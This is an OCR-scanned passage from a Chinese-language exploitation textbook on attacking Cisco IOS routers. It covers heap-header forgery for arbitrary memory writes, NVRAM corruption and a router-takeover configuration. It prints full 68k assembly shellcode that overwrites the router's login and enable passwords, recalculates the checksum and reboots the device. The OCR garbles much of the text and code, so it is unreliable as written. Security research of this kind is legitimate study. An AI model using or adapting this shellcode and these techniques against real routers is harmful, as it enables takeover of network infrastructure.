在 这 个 结构 里 ， 第 二 个 条 目 就 是 进程 的 当前 栈 指针 。 因 为 Load Meter 每 30 秒 执行 一 次 ， 所 
以 多 查询 几 次 就 可 以 得 到 一 个 稳定 的 值 。 用 show stacks 命 令 加 上 进程 的 PID 可 以 查询 进程 的 
Beli: 


(D 可 能 是 0x02041584。 一 一 译 者 注 
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radio#tsh stacks 1 
Process 1: Load Meter 
Stack segment Q0x20411A0 - 0x2041588 
FP: 0x204156C, RA: 0x80E2870 
FP: 0x2041578, RA: Ox80EDEEC 
FP: 0x0, RA: Ox80EF1D0 


利用 获得 的 信息 ,就 可 以 找到 被 破解 进程 栈 的 可 工作 的 返回 地 址 。 当 然 ， 难题 是 特殊 型 号 路 
由 器 的 众多 IOS 映 像 中 的 一 个 或 几 个 才 有 这 样 稳定 的 地 址 。 一 般 而 言 ， 使 用 启动 时 已 经 获得 正确 
加 载 的 进程 栈 是 安全 的 。 前 几 个 进程 的 加 载 顺 序 一 般 是 固定 的 ， 因 为 它们 在 映像 中 的 地 址 是 硬 编 
码 的 ; 而 根据 具体 的 配置 或 其 他 的 硬件 模块 ， 其 他 的 进程 可 能 会 稍 后 加 载 。 因 此 ， 这 些 进程 的 加 
载 顺 序 不 是 固定 的 ， 每 次 重启 后 ， 它 们 的 栈 在 内 存 中 的 位 置 都 会 有 变动 。 

视 具 体 的 目标 平台 而 定 , 你 可 以 用 局 部 改写 帧 指针 或 返回 地 址 的 方法 更 稳定 地 执行 代码 。 大 
多 数 思 科 设 备 运行 在 big-endian 机 器 上 ， 比 起 little-endian 平 台 来 ，big-endian 平 台 上 的 局 部 改写 作 
用 不 大 。 如 果 漏 洞 允许 且 目 标 是 little-endian， 只 改写 返回 地 址 的 一 两 个 字 节 ， 将 会 保持 高 24 位 或 
16 位 不 会 被 破坏 ， 当 与 较 长 的 缓冲 区 结合 使 用 时 ， 可 能 会 获得 与 位 置 无 关 的 返回 地 址 。 

应 该 强调 ， 到 目前 为 止 ， 在 IOS 上 获得 真正 稳定 地 执行 代码 的 方法 是 ， 识 别 透 露 了 实际 内 存 
地 址 的 内 存 泄露 漏洞 。 如 果 用 这 些 信 息 可 以 推断 出 攻击 者 提供 数据 的 位 置 ， 那 么 将 有 可 能 通过 用 
已 知 位 置 改 写 返 回 地 址 来 可 靠 地 执行 代码 。 攻 击 者 提供 的 数据 保存 在 内 存 区 的 什么 地 方 并 不 重 
要 ， 因 为 IOS 并 没有 禁止 在 堆栈 上 执行 代码 。 
13.4.2 Mj 

如 果 正 在 溢出 的 缓冲 区 保存 在 堆 块 里 , 那么 结果 通常 是 所 谓 的 软 强 制 骨 江 。 当 这 种 情形 出 现 
时 ，Check Heaps 进 程 会 发 现 恶 化 的 堆 结构 ， 并 告诉 IOS 册 演 了 ， 将 受 影响 区 域 的 内 存 内 容 转 储 出 
来 ， 重 启 路 由 器 。 在 众多 的 输出 内 容 中 ， 你 会 看 到 下 面 这 一 行 : 

00:00:52: $SYS-3-OVERRUN: Block overrun at 209A1E8 (redzone 41414141) 

前 面 提 过 ，IOS 用 静态 魔幻 值 检测 堆 块 是 否 被 溢出 。 在 这 个 例子 里 ，Check Heaps 将 发 现 堆 块 
不 是 以 魔幻 值 0xFD0110DF 结 束 的 ， 而 是 以 0x41414141 结 束 的 。 利 用 这 类 漏洞 的 方法 与 在 通用 操 
作 系 统 上 利用 堆 洲 出 一 样 。 当 堆 管 理 代 码 改 变 块 列表 时 ,攻击 者 提供 的 数据 替换 在 堆 块 后 面 的 管 
理 头 信息 里 的 信息 ， 把 一 个 已 知 值 写 入 一 个 已 经 位 置 。 使 用 的 方法 与 第 $ 章 中 讨论 的 方法 类 似 。 

1.10S 相 关 问 题 

为 了 使 这 个 方法 可 以 工作 , 这 个 值 必须 与 IOS 期 望 的 值 一 致 。 这 对 固定 的 魔幻 值 来 说 很 容易 ， 
但 是 要 求 当 使 用 可 预言 的 字 节 时 ， 你 的 溢出 在 目标 缓冲 区 中 总 会 发 生 。 例 如 ， 如 果 由 于 域名 或 其 
他 不 好 预言 的 信息 ， 在 red zone 和 其 后 堆 块头 部 被 影响 前 ， 缓 冲 区 里 需要 的 字 节 数 是 变化 的 ， 这 
将 导致 不 能 很 好 地 工作 。 

另 一 个 严重 的 问题 是 ，Check Heaps 进 程 在 堆 结构 (参见 13.1.3 节 的 列表 ) 上 执行 的 验证 列 
表 。 在 分 配 或 释放 堆 块 的 时 候 , 根据 不 同 的 IOS 的 版 本 和 映像 , 这些 验证 的 子 集 也 可 能 会 被 执行 。 
因为 这 个 检查 包括 了 对 后 续 的 和 前 面 的 指针 的 循环 检查 ， 没 有 已 知 的 方法 可 以 用 任意 值 替 换 它 
们 。 这 意味 着 前 面 的 指针 必须 包含 它 之 前 的 正确 的 值 ， 对 稳定 的 远程 破解 来 说 ， 这 并 不 是 一 个 
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好 的 基础 。 

在 想 出 解决 办 法 之 前 ， 实 验 性 质 的 IOS 堆 利用 程序 将 用 事先 记录 的 值 处 理 PrevBlock 指 针 ， 
因为 没有 可 以 工作 的 值 。 攻 击 者 为 了 使 路 由 器 使 用 堆 块 里 可 以 预言 的 地 址 ， 必 须 先 使 它 崩 溃 。 像 
前 面 提 到 的 那样 ， 加 载 和 启动 进程 很 好 预言 ,刚刚 重启 的 路 由 器 在 分 配 块 时 很 可 能 会 使 用 相同 的 
内 存 地 址 。 这 可 以 理解 为 “ 仅 在 实验 室 中 可 以 很 好 地 预言 ”。 

free 函 数 在 执行 前 ， 还 需要 验证 堆 块 的 BlockSize 字 段 ， 但 我 们 可 以 通过 替换 修正 值 或 
0x7FFFFFD0 与 0x7FFFFFFF 之 间 的 某 个 值 蒙混 过 关 。 因 为 一 旦 管理 代码 为 之 加 上 40B， 它 们 将 会 
重 登 。 堆 块 结构 里 的 其 他 值 根 本 不 会 被 验证 ， 因 此 可 以 用 任何 值 改写 它们 。 

因此 ， 当 溢出 堆 块 边界 时 ， 需 要 重建 完整 的 堆 块头 。 表 13-4 显 示 了 需要 填充 哪些 内 容 。 


R134 WAER 

段 要 RK 值 
REDZONE 必须 准确 OxFDO110DF 
MAGIC 必须 准确 0xAB1234CD 
PID 必须 准确 一 
AllocCheck ”无 需求 一 
AllocName 无 需求 必须 指向 文本 段 的 某 个 字符 串 
AllocPC 无 需求 一 
NextBlock 必须 位 于 映射 的 内 存 区 域 一 
PrevBlock 必须 准确 改写 后 的 值 
BlockSize 必须 设置 使 用 的 MSB， 不 用 的 块 的 MSB 必 须 清除 Ox7FFFFFFF 
RefCnt 必须 非 空 1 
LastFree 无 要 求 — 





读者 们 肯定 会 注意 到 ， 当 使 用 这 个 头 部 的 操作 被 执行 时 ， 上 表 略 述 的 需求 允许 改写 堆 块 头 并 
通过 测试 ， 但 不 允许 向 任意 甚至 受 限 的 内 存 区 域 写 入 任何 数据 。 在 当前 的 结构 里 ， 根 本 还 未 涉及 

2. 涉及 取消 链接 的 内 存 写 操作 

一 旦 构造 了 伪造 的 块 , 我 们 就 可 以 通过 连续 的 缓冲 区 溢出 把 它 写 到 下 一 个 堆 内 存 块 里 。 如果 
通过 不 设置 BlockSize 字 段 最 高 位 的 方式 把 伪造 的 堆 块 头 部 标记 为 末 使 用 , 则 开始 溢出 的 堆 块 将 被 
取消 分 配 ，IOS 为 了 使 堆 碎片 最 少 ， 将 会 尝试 着 把 两 个 堆 块 合并 成 一 个 大 的 空闲 堆 块 。 

13.1.3 节 曾 提 到 过 ， 空 闲 内 存 块 在 载荷 部 分 还 保存 有 额外 的 内 存 管理 信息 。 这 些 字段 也 会 被 
验证 ， 但 与 主 头 部 相 比 ， 对 它们 的 验证 就 不 那么 严格 了 。 另 外 ， 程 序 员 习 惯 了 速度 优先 而 不 是 结 
构 化 代码 的 开发 。 空闲 块 合并 完全 基于 NextFree 和 prevFree 指 针 。 合并 两 个 块 所 执行 的 操作 是 : 

Q PrevFree 里 的 值 被 写 到 NextFree + 20 指 向 的 地 址 ; 

口 NextFree 里 的 值 被 号 到 PrevFree 指 向 的 地 址 。 

因此 , 如 果 某 人 设法 用 IOS 认 为 有 效 的 数据 改写 主 堆 内 存 块 , 并 提供 额外 的 空闲 块头 部 信息 ， 
那么 一 旦 这 个 块 被 合并 ， 就 可 以 把 任意 值 写 到 任意 的 内 存 地 址 。 
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3. 其 他 选择 

和 大 多 数 用 C 编 写 的 大 型 应 用 程序 一 样 ，IOS 也 使 用 了 大 量 的 指针 。 实 际 上 ， 它 的 行为 有 点 
像 操 作 系 统 ， 需 要 提供 动态 代码 功能 ， 这 样 ， 在 代码 里 启用 或 禁用 设备 只 需 增加 需要 的 指针 列表 
就 可 以 了 。IOS 代 码 里 的 许多 功能 都 依赖 于 保存 在 类 似 结构 里 的 回调 函数 地 址 。 

比如 ，IOS 里 面 甚至 有 设备 “列表 ” 可 以 用 show 1ist 命 令 查看 。 当 在 这 条 命令 后 面 加 上 列 
表 号 时 ， 输 出 的 内 容 和 下 面 的 类 似 : 

radio#show list 2 

list ID is 2, size/max is 1/- 

list name is Processor 

enqueue is 0x80DC044, dequeue is 0x80DC132, requeue is 0x80DC1E2 

insert is 0x80DC2C2, remove is Ox80DC3F0, info is Ox80DC84C 

head is 0x201AD44, tail is 0x201AD44, flags is Ox1 


# Element Prev Next Data Info 
0 201AD44 0 0 201AD34 


SiH Henqueue. dequeue. requeue. insert. remove 和 info 地 址 都 是 IOS 代 码 库 里 的 函 
数 ， 它 们 在 创建 列表 时 被 注册 。 当 必须 在 列表 结构 上 执行 各 自 的 操作 时 ， 调 用 这 些 函 数 。IOS 里 
有 许多 这 样 的 数据 结构 。 因 此 ， 在 设法 执行 完全 的 堆 破 解 之 前 ,检查 正在 溢出 的 堆 块 内 容 是 很 明 
智 的 。 如 果 你 读 了 很 多 代码 ， 并 且 有 好 运 相伴 ， 将 更 有 可 能 溢出 到 这 些 结构 中 的 一 个 ， 而 不 是 紧 
随 其 后 的 堆 头 部 。 

4. 局 部 攻击 

当 在 堆 块 上 审查 检查 列表 时 ， 应 该 坚持 不 验证 NextBlock 指 针 。 这 对 攻击 者 很 有 利 ， 因 为 稍 
后 在 修改 链表 时 ， 就 会 用 到 NextBlock 指 针 。 

€ NVRAM 失效 

不 检验 NextBlock 指 针 的 方法 是 否 可 用 取决 于 路 由 器 的 型 号 。 在 一 些 型 号 里 ，NVRAM (BR 
射 flash 内 存 的 内 存 区 域 ) 用 于 保存 路 由 器 的 配置 ， 对 IOS 是 可 写 的 。 而 在 一 些 其 他 型 号 的 路 由 器 
里 ， 这 个 内 存 区 域 映 射 成 只 读 的 ， 只 有 在 IOS 需 要 配置 保存 到 它 里 面 时 ， 它 才 被 允许 写 。 

通过 提供 指向 映射 NVRAM 区 域 的 NextBlock 指 针 ， 在 堆 块 链表 上 的 操作 将 促成 路 由 器 把 指 
针 值 写 到 它 的 配置 段 (section) 里 。 如 果 NVRAM 是 只 读 的 ， 那 么 路 由 器 将 会 由 于 写 保护 异常 而 
骨 演 ， 并 重新 启动 。 然 而 ， 如 果 NVRAM 是 可 写 的 ， 路 由 器 将 会 一 直 运 行 下 去 ， 直 到 Check Heaps 
发 现 亚 化 的 堆 后 重启 系统 。IOS 在 系统 恢复 后 将 会 检查 保存 在 配置 里 的 检验 和 ， 最 后 终 将 发 现 校 
验 和 已 不 再 正确 了 。 如 果 思 科 路 由 器 没有 有 效 的 配置 ， 它 会 默认 请 求 配置 信息 ， 并 通过 
BOOTP/TFTP 把 这 个 请 求 广播 到 网 络 上 。 如 果 攻 击 者 位 于 同一 LAN 网 段 ， 他 就 可 以 为 路 由 器 提供 
配置 ， 从 而 控制 这 个 设备 。 

e 全 局 变量 改写 

由 于 IOS 的 整体 性 ， 许 多 变量 需要 全 局 保存 ， 所 以 可 以 随时 访问 它们 。 在 这 些 变量 中 有 一 种 
类 型 是 标志 〈flag) (与 信号 量 类 似 )， 它 指示 正在 执行 的 中 断 处理 例 程 或 非 重 入 函数 ， 从 而 防止 
再 次 调用 同一 函数 。 当 然 ， 同 样 可 以 用 它 指示 NVRAM 是 否 失效 ， 因 为 为 了 表示 “ 真 值 ” 布尔 
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变量 不 一 定 非 要 是 空 值 。 因 此 ， 堆 列表 一 旦 被 重新 组 织 ，NextBlock 指 针 指 向 的 布尔 全 局 变量 将 
会 被 设 成 “ 真 ”。 

Gyan Chawdhary 声 称 找到 了 一 个 方法 ， 可 以 预防 骨 溃 的 路 由 器 Check Heaps， 但 在 写本 书 的 
时 候 ， 他 还 没有 提供 证 据 。 尽 管 这 听 起 来 有 些 道理 ， 但 现在 还 不 清楚 损坏 的 Check Heaps 进 程 是 
否 可 以 使 代码 执行 简单 化 。 这 个 方法 显然 包括 了 设置 一 个 标记 : 告诉 IOS 它 己 经 崩溃 了 ， 因 此 阻 
IE AAS IE BY AA HR. 

在 负责 向 CPU 提供 最 终 追 踪 指令 的 代码 里 也 有 这 样 的 标记 ， 所 以 它 可 能 是 个 神秘 的 标记 。 这 
个 标记 像 信号 量 那样 ， 用 于 防止 再 次 进入 崩溃 的 函数 。 在 反 汇 编 器 里 寻找 这 个 函数 的 方法 中 ,最 
简单 的 方法 是 搜索 交叉 引用 字符 串 “software-Eforced reload”: 


text:080EBB68 sub 80EBB68 : 
text:080EBB68 var 4 
text:080EBB68 arg O0 
text:080EBB68 


text:080EBB68 link a6, #0 
text:080EBB6C move.l d2,-(sp) 
text: 080EBB6E move.l arg 0(a6),d2 
text:080EBB72 tst.l (called | 200B218).1 
; Was crash function already called? 
text:080EBB78 bne.w loc text 80EBC18 
; Exit if so 
text:080EBB7C moveq #1,da1 
text: O80EBB7E move.l di,(called 200B218).1 
; mark function as called 
text: O80EBB84 bsr.w breakpoint  80EB9B8 
text:080EBBB8 pea aSoftwareForcedReloa 
; “\n\ns%Software-forced reload\n" 
text :080EBB8C pea (SFFFFFFFE).w 
text:080EBB90 bsr.l sub text 807CB72 


像 前 面 提 到 的 , 许多 这 样 的 全 局 变量 都 可 以 被 识别 。 但 它们 都 有 依赖 映像 文件 的 缺点 , 因此 ， 
可 能 只 影响 数 千 个 映像 中 的 一 个 。 与 这 类 变量 接近 的 是 初始 启动 代码 ， 至 少 对 思科 IOS 映 像 的 某 
些 分 支 来 说 ， 我 们 将 有 更 多 机 会 及 时 在 某 些 点 识别 通用 地 址 位 置 。 


13.4.3 shellcode 

尽管 可 以 通过 Telnet (有 些 也 可 以 通过 SSH) 访问 思科 路 由 器 ， 但 它 里 面 的 shell 概 念 与 标准 
UNIX 甚 至 Windows 系 统 里 的 概念 是 不 一 样 的 。 因 此 ， 如 果 可 以 执行 代码 ， 那 么 IOS 上 的 shellcode 
所 做 的 事情 肯定 也 不 一 样 。 

1. 改变 配置 的 shellcode 

第 一 个 尝试 是 简单 地 修改 路 由 器 的 配置 。 这 个 方法 最 大 的 优势 是 , 我 们 可 以 只 根据 型 号 来 编 
写 shellcode， 判 断 依据 是 ， 系 统 取决 于 不 同型 号 上 的 NVRAM 被 映射 到 不 同 的 内 存 区 域 。 另 外 ， 
现在 大 多 数 型 号 禁止 写 入 NVRAM， 因 此 ，shelicode 必 须知 道 怎样 打开 内 存 页 上 的 写 许 可 。 除 此 
之 外 ， 这 类 shellcode 将 完全 不 受 IOS 映 像 和 功能 的 约束 ， 因 为 它 将 直接 在 硬件 上 运行 。 
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e 完全 替换 

这 类 代码 所 做 的 是 把 随身 携带 的 配置 传 给 路 由 器 。 一 旦 执行 ， 代 码 将 把 配置 写 入 NVRAML 
重新 计算 检验 和 及 长 度 字 段 ， 并 把 结果 写 回 NVRAM， 然 后 通过 文档 中 介绍 的 冷 起 动 CPU 的 方法 
重启 路 由 器 。 当 路 由 器 恢复 后 ，shellcode 携 带 的 配置 就 替换 了 原先 的 配置 ， 因 此 ， 攻 击 者 可 以 完 
全 访问 这 人 台 路 由 器 ， 当 然 前 提 是 它 携 带 的 配置 必须 是 正确 的 。 

幸运 的 是 ， 在 IOS 中 所 有 的 配置 命令 都 可 以 缩写 ， 只 要 它们 之 间 可 以 区 分 即 可 。 此 外 ， 配 置 
文件 里 没有 明确 设置 的 条 目 ， 系 统 将 会 为 之 分 配 或 多 或 少 合理 的 默认 值 。 这 样 ， 整 个 配置 就 可 以 
非常 简短 : 

enape 

in e0 

ip ad 62.1.2.3 255.255.255.0 

ip route 0.0.0.0 0.0.0.0 62.1.2.1 

li1v04 


pas c 
logi 


上 面 的 命令 配置 Telnet， 把 密码 设 为 ce， 设 置 Ethernet0 接 口 的 IP 地 址 ， 包 括 到 下 一 路 由 器 的 默 
认 路 由 。 这 个 配置 一 旦 被 加 载 ， 攻 击 者 就 可 以 远程 连 到 这 个 耻 ， 并 根据 他 的 需要 进一步 修改 路 由 
器 配置 。 

在 执行 这 类 攻击 时 一 定 要 记 住 , NVRAM 是 慢 速 媒介 , 不 能 频繁 地 向 它 里 面 写 入 数据 ,因此 ， 
复制 操作 之 间 必 须 有 延迟 。 同 样 ， 禁 止 平台 上 的 所 有 中 断 也 很 重要 ， 否 则 ， 仍 可 以 看 到 网 络 流量 
的 接口 将 会 中 断 复制 操作 ， 并 回 到 IOS。 

@ 部 分 替换 

除了 蔡 换 整个 配置 外 ， 我 们 也 可 以 只 搜索 并 修改 需要 的 内 容 ， 例 如 密码 。 前 提 是 攻击 者 可 以 
对 这 人 台 机 器 执行 Telnet 或 SSH 访 问 ， 只 是 因为 没有 密码 而 被 拒 之 门 外 了 。 也 可 以 在 本 地 大 缓冲 区 
的 情形 里 使 用 这 类 shellcode， 因 为 指示 会 议 特权 的 标记 往往 就 在 IOS 内 存 周围 ， 就 像 其 他 代码 所 
做 的 那样 。 

适用 于 思科 2500 型 号 、 搜 索 并 替换 shellcode 的 例子 如 下 : 


+H 


# text segment 
.globl _start 


_start: 
# 
# Preamble: unprotect NVRAM and disable Interrupts 
# 
move.l #0x0FF010C2,a0 
lsr (a0) 
move.w #0x2700,sr; 
move.l #0x0FF010C2,a0 
move.w #0x0001, (a0) 
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# 
# First, look for the magic value (0xABCD) 
# 
move.l #0x0E000000,a0 
find_magic: 
addg.1 #2,a0 
cmp.w #0xABCD, (a0) 
bne.s find magic 
# 
# a0 should now point to the magic 
# make al point to the checksum 
# 
move.l a0,al 
addq.1 #4,al 
# 
# make a2 point to the suspected begin off the config 
# 
move.l al,a2 
addq.1 #8,a2 
addq.1 #8,a2 


modmain: 
emp.b #0x00, {a2) 
beq.s end_of_config 


# 

# search for the password string 

# 

lea S_password(pc),a5 

bsr.s strstr 

tst.1 dO 

# if equal to 0x00, string was not found 
beq.s next1 


# 

# found password string, d0 already points to where we want to replace it 
# 

move.l d0,a4 

lea REPLACE_password(pc),a5 

bsr.s nvcopy 


next1: 
# 
# search for the enable string 
# 
lea S_enable(pc),a5 
bsr.s strstr 
tst.1 do 
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beq.s next2 


# 
* found enable string, d0 already points to where we want to replace it 
# 
move.l d0,a4 
lea REPLACE enableí(pc),a5 
bsr.s nvcopy 
next2: 
addq.l #0x1,a2 
bra.s modmain 


end of config: 
# 
# All done, now calculate the checksum and replace the old one 
# 
# clear checksum for calculation 
move.w #0x0000, (al) 


# delay until the NVRAM got it 
move.l #0x00000001,d7 
move.1 #0x0000FFFF,d6 
chksm_delay: 

subx d7,d6 

bmi.s  chksm delay 


* load begin of buffer to a5 
move.l a0,a5 


# calculate checksum 
bsr.s chksum 

# write checksum to NVRAM 
move.w d6, (al) 


# delay until the NVRAM got it 
move.l #0x00000001,da7 
move.l #0x0000FPFF,d4 
final_delay: 

subx d7,d4 

bmi.s final delay 


restart: 
move.w #0x2700,%sr 
moveal  40xOFF00000,$a0 
moveal (%a0),%sp 
moveal #0x0FFO0004,%a0 
moveal (%a0),%a0 
jmp ($a0) 
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TIERE RE E IERERERE ERE AEBREHIEREREIEIEHIORETEREREHREHEERERIERRERIHEHEREHIE E E E G 
# 
# searches for the string supplied in a5 
# if found, dO will point to the end of it, where the modification can take place 
# if not found, dO will be 0x00 
strstr: 
move.l a2,a4 


strstr_2: 
cmp.b #0x00, (a5) 
beq.s strstr_endofstr 
cmp.b (a5)+, (a4)+ 
beg.s strstr 2 


# strings were not equal, restore a2 and return 0 in d0 
clr.1 do 
rts 


strstr endofstr: 
# strings were equal, return end of it in d0 
move.l a4,d0 
rts 

# 

HEHE ERE EH EERE RH HH EE HHE 


HEAHHRHEEH ARREST REE ABHAE HEHE HEHE EEE RE 
# 
# nvcopy 
# copies the string a5 points to to the destination a4 until (a5) is 0x00 
# 
nvcopy: 
# delay 
move.l #0x00000001,da7 


nvcopylil: 

cmp.b #0x00, (a5) 

beq.s nvcopy_end 
move.b (a5)+, (a4)+ 

# 

# do the delay 

# 

move.l #0x0000FFFF,d6 
nvcopy_delay: 

subx d7,d6 
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bmi.s nvcopy delay 


# again 
bra.s nvcopyli 


nvcopy end: 
rts 


# 
HHH EHH AEH ESSE EEE AHHH EERE HR BABERE E AE 


GARAE E EEEE EEEE EEEE EEEE AEA ERE EEEE E EEEE] 
# 
# chksum 
# calculate the checksum of the memory at a5 until 0x00 is reached 
# 
chksum: 

clr.1 d7 

clr.1 do 

chk1: 

# count 0x0000 segences in dO up and exit when d0»10 

cmp.w #0x0000, (a5) 

bne.s chk hack 

# 0x0000 sequence found, branch out to chk2 only if 0x0000 count > 10 

addq.1 #1,d0 

cmp.l 410,d0 

beq.s chk2 

chk hack: 

clr.1l d6 

move.w (a5)+,d6 

add.l d6,d7 

bra.s chk1 


Chk2: 

move.l d7,d6 

move.l d7,d5 
chk3: 

and.l $0x0000FFFF,d6 
lsr.1 #8,d5 

lsr.1 £$8,d5 

add.w d5,d6 

move.l d6,d4 

and.1 #0xFFFF0000, d4 
bne chk3 





not.w d6 


# done, returned in d6 
rts 
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# 
HERTHA RHEE AEH TE EHE EHE HE EHH A HHH EE A E E E 


S_password: 

-asciz "\n password " 
S_enable: 

-asciz "\nenable " 


REPLACE, password: 

.asciz "“phenoelit\n" 

REPLACE enable: 

-asciz "password phenoelit\n" 


# --- end of file --- 


2. 修改 运行 时 映像 的 shellcode 

对 于 shellcode 来 说 ， 还 有 一 种 可 能 ， 就 是 修改 而 不 是 配置 IOS 的 代码 。 它 的 好 处 是 不 用 重启 
路 由 器 即 可 简单 地 禁用 和 改变 路 由 器 的 功能 。 如 果 攻 击 者 非常 熟悉 被 攻击 的 映像 ， 他 们 可 以 去 除 
文本 区 所 在 的 内 存 区 域 的 保护 ， 并 修改 位 于 已 知 位 置 的 代码 里 的 字 节 ， 继 续 后 面 的 操作 。 当 然 ， 
对 于 基于 栈 的 缓冲 区 溢出 破解 程序 , 或 者 对 于 今天 已 经 不 复 存 在 的 非常 高 级 且 稳 定 的 堆 溢 出 破解 
程序 来 说 ， 这 只 是 一 种 选择 。 

这 类 shellcode 也 可 以 修改 line access (Telnet) 的 密码 验证 全 程 并 启用 模式 。 一 旦 把 它们 修改 
成 无 条 件 通 过 密码 验证 ,攻击 者 就 可 以 用 任意 密码 远程 连 网 这 人 台 机 器 ， 并 同样 可 以 把 权限 提升 为 
启用 模式 。 已 经 有 人 实现 这 类 shellcode 了 ， 而 且 它 们 运行 得 非常 好 。 

3. 绑 定 shell 

第 一 次 出 现在 BlackHat Briefings Las Vegas 2005 上 的 由 Michael Lynn 编 写 的 IOS 绑 定 shell， 被 
认为 是 最 好 的 思科 shellcode。 但 是 ， 这 次 演讲 在 思科 和 IIS 干 扰 之 后 被 取消 了 ， 因 此 ，Michael 的 
实现 细节 一 直到 现在 都 未 公开 。 

对 IOS 绑 定 shellcode 来 说 ， 最 有 前 途 的 方法 就 是 重用 IOS 中 已 经 存在 的 代码 。 因 为 IJOS 没 有 像 
通用 操作 系统 那样 提供 系统 调用 ， 因 此 ， 它 本 身 不 存在 shell 进 程 ， 也 不 能 通过 监听 套 接 字 并 在 进 
入 的 连接 上 执行 程序 而 实现 。 然 而 ，IOS8 的 开发 者 在 为 设备 实现 服务 的 时 候 ， 也 要 解决 类 似 的 问 
题 。 例 如 ，IOS 中 finger 服 务 的 输出 内 容 实际 上 与 show users 命 令 输出 的 内 容 一 模 一 样 。 因 此 ， 
我 们 可 以 假设 服务 处 理 例 程 就 是 所 指 命令 的 真正 实现 。 

如 果 查 看 IOS 映 像 的 反 汇编 代 码 并 搜索 命令 的 字符 串 ， 将 会 发 现 只 有 一 个 小 函数 使 用 这 样 的 
字符 串 。 它 包含 的 代码 如 下 : 


text:0817B136 
text:0817B138 
text:0817B13A 
text:0817B13E 
text :0817B140 
text:0817B144 
text:0817B146 
text:0817B148 





Alt, 显然 有 个 接收 大 量 参数 (包括 要 执行 的 命令 ) 的 函数 。 这 个 函数 唯一 一 个 不 同 的 参 
数 不 是 0 就 是 1 应 该 是 一 个 指向 数据 结构 的 指针 )。 这 个 结构 包含 的 类 似 于 套 接 字 描 述 符 的 东西 
应 该 可 以 猜 到 ， 因 为 被 调用 的 函数 必须 可 以 向 TCP 通 道 ( 而 不 是 控制 台 ) 发 送 命令 的 输出 。 在 映 
像 已 经 解压 到 RAM 里 的 2600 路 由 器 上 , 可 以 通过 ROMMOM 修 补 这 个 字符 串 ， 从 而 验证 这 个 理论 


是 否 可 行 : 


BurningBridge# 


pea 
move.1 
move.1 
bsr.w 


-(sp) 

-(sp) 

(1).w 

-(sp) 

aShowUsers 
d2,-(sp) 

d0, - (sp) 
sub_text_817AF7E 


*** System received an abort due to Break Key *** 


signal= 0x3, 


rommon > priv 


Password: 


code= 
PC = 0x8080be78, Vector = 


context= 0x820f5bf0 
0x500, SP 


Ox81fec49c 
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; null 

; null 

7 1 

; null 

; "Show users" 
2 


; line 


You now have access to the full set of monitor commands. 
Some commands will allow you to destroy your 
configuration and/or system images and could render 


Warning: 


the machine unbootable. 


rommon > dump -b 0x81855434 0x20 
73 68 6£ 77 20 75 73 65 72 73 00 00 Oa 54 43 50 show 


81855434 
users...TCP 
81855444 

att 

rommon » 
81855434 - 73 
81855435 - 68 
81855436 - 6f 
81855437 = 77 
81855438 = 20 
81855439 = 75 
8185543a = 73 
8185543b = 65 
8185543c = 72 
8185543d = 73 
8185543e = 00 
8185543f = 00 
rommon > cont 
BurningBridge# 


3a 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 61 74 74 : connection 


alter -b 0x81855434 


V VV VV NN V NN NN 


向 路 由 器 发 送 finger 请 求 表明 执行 的 是 show flash 命 令 ， 而 不 是 用 户 列表 ， 


fx@linux:~$ finger 0@192.168.2.197 
{192.168.2.197] 
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System flash directory: 
File Length Name/status 
1 11846748  c2600-ipbase-mz.123-8.T8.bin 
[11846812 bytes used, 4406112 available, 16252924 total] 
16384K bytes of processor board System flash (Read/Write) 


当 在 映像 中 检查 被 代码 所 引用 的 (finger 处 理 函 数 记 在 的 ) 位 置 时 ， 将 以 一 个 较 大 的 函数 结 
束 《〈 它 向 重复 调用 的 注册 函数 传递 许多 这 样 的 小 处 理 函 数 )。 在 它们 之 中 ， 我 们 又 发 现 了 finger 


服务 处 理 程序 ， 
text:08177C2A clr.1 (sp) 
text:08177C2C pea (tcp. finger handler  817B10C).1 
text:08177C32 pea ($4F).w 
text:08177C36 pea ($13).w 
text:08177C3A pea (4).w 
text:08177C3E bsr.l sub text 80E8994 
text:08177C44 addq.w #8,sp 
text:08177C46 addq.w #8,sp 


参数 4 未 知 ， 但 0x31 似 乎 是 TCP 协 议 指示 器 ， 而 0x4F 则 明显 是 finger 服 务 的 端口 号 。 从 而 可 以 
推断 ， 存 在 一 个 注册 函数 ， 它 接受 protocol/port/handler 3-touples， 并 向 IOS 注 册 它 们 。 因 此 ， 开 发 
一 个 shellcode， 把 函数 注册 到 未 用 的 端口 并 执行 shel 命 令 是 有 可 能 的 。 只 不 过 时 至 今日 ， 仍 未 见 
过 这 样 的 shellcode。 


13.5 小结 


只 有 一 小 部 分 人 在 公开 研究 怎样 破解 思科 IOS， 部 分 原因 是 它 很 神秘 ， 另 外 的 原因 则 可 能 是 
需要 的 设备 太 晶 贵 了 。 有 了 思科 7200 模 拟 器 Chttp//www.ipflow.utc.fr/index.php/Cisco 7200 - 
Simulator)， 更 多 人 就 可 以 参与 这 个 有 趣 的 游戏 了 。 

这 个 领域 非常 有 趣 ， 因 为 破解 程序 里 经 常 使 用 的 路 径 并 不 直接 适用 于 IOS。 由 于 地 址 空间 随 
机 化 的 引入 ， 在 普通 操作 系统 中 频繁 出 现 问题 ， 而 现在 它 也 成 为 可 靠 破解 1OS 的 主要 障碍 。 但 另 
一 方面 ， 大 部 分 的 因特网 和 公司 网 络 仍 运行 在 几乎 没有 保护 的 思科 设备 上 。 

理解 思科 设备 里 硬件 和 软件 设计 的 含义 , 创造 性 地 使 用 这 样 的 知识 , 在 某 一 天 可 能 会 生成 可 
靠 且 工作 良好 的 IOS 破 解 程 序 。 机 会 之 门 等 待 有 心 人 来 开启 。 






保护 机 制 | 








增加 常见 的 保护 机 制 。 所 有 这 些 机 制 ( 除 代码 审计 外 ) 都 致力 于 减少 破解 成 功 的 可 能 性 ， 
而 不 是 从 根本 上 消除 漏洞 ， 因 此 ， 保 护 机 制 里 的 任何 小 问题 都 可 能 被 攻击 者 利用 来 执行 代码 。 
本 章 首先 介绍 一 些 常见 的 保护 机 制 ， 然 后 再 讨论 他 们 在 各 个 操作 系统 上 的 细节 。 此 外 ,我 们 
也 会 介绍 保护 机 制 里 的 弱点 ， 以 及 如 何 绕 过 这 些 保护 机 制 。 


14.1 保护 
本 章 通 篇 都 需要 显示 在 采用 不 同 的 保护 措施 时 的 栈 布局 。 下 面 是 作为 例子 的 C 代 码 : 


#include <stdio.h> 
#include <string.h> 


随 着 代码 执行 bug 和 破解 程序 的 增加 ， 操 作 系 统 厂商 为 了 保护 他 们 的 用 户 ， 开 始 在 产品 中 


int function(char *arg) { 
int varl; 
